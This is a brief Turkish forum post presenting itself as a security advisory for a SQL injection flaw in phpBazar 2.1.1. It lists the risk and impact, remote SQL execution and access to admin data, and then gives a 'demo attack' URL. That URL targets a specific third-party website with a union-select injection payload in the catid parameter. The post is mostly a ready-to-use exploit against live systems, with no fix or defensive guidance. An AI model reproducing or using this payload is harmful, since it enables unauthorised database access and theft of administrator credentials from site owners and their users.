

Phpbazar 2.1. SQL Sokuşturma Güvenlik Açığı
-
Risk: Normal
Etki : uzaktan SQL kod caliştirma ve Admin bilgilerine erişme
Etkilenenler: phpBazar 2.1.1 Sürümünde var bu güvnelik açığıExploit:
Demo saldırı:
http://toutsurlegoldenretriever.fr/phpBazar-2.1.1fix/classified.php?catid=2
+and+1=0+union+all+select+1,2,3,4,5,6,7-- -
sondaki profil linki galba o yanlıs olmus
Toplam Hit: 1771 Toplam Mesaj: 2